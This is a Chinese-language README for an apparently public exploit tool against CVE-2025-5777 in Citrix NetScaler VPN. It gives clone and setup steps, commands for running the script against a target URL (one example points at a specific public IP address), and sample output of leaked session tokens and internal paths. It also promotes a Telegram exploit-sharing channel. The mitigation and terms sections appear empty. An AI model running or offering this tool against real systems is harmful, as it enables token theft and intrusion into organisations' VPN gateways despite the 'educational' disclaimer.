一个强大的教育工具,旨在演示和分析影响 Citrix NetScaler VPN 的漏洞 CVE-2025-5777。
本项目是 GO-TO CVE 倡议的一部分。
⚠️ 仅供教育目的。请勿在您未拥有或未获得明确测试许可的系统上使用。
该脚本尝试检测并提取由存在漏洞的 Citrix VPN 端点泄露的敏感内部令牌、内部 IP 和隐藏端点路径。
它旨在帮助学生、安全研究人员和红队成员更好地了解真实世界中的 CVE 是如何被发现和分析的。
git clone https://github.com/soltanali0/CVE-2025-5777-Exploit.git
cd CVE-2025-5777-Exploit
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
需要 Python 3.8+ 可选:您可以使用虚拟环境
python3 exploit.py https://target-vpn.com
--proxy http://127.0.0.1:8080 以通过 Burp/SOCKS 路由--silent 以抑制输出--output result.json 以保存为 JSON示例:
python3 exploit.py https://20.237.190.100 --output leaks.json
[!] Leak analysis:
→ Tokens found: ZWZlNjViZDA4NThj...
→ Paths found: /nf/auth/doLogoff.do, /nf/auth/doEPA.do, /Credential
以及
为了避免此 CVE 被利用:
此工具发布严格用于教育和合法研究目的。
开发者对使用此代码进行的任何滥用或非法活动不承担任何责任。
使用此工具即表示您同意:
加入 CVE 泄露和漏洞利用研究社区:
👉 https://t.me/GOTOCVE
由 Ali Soltani 开发——红队成员和 CVE 猎人。
自豪地成为 GO-TO CVE 的一部分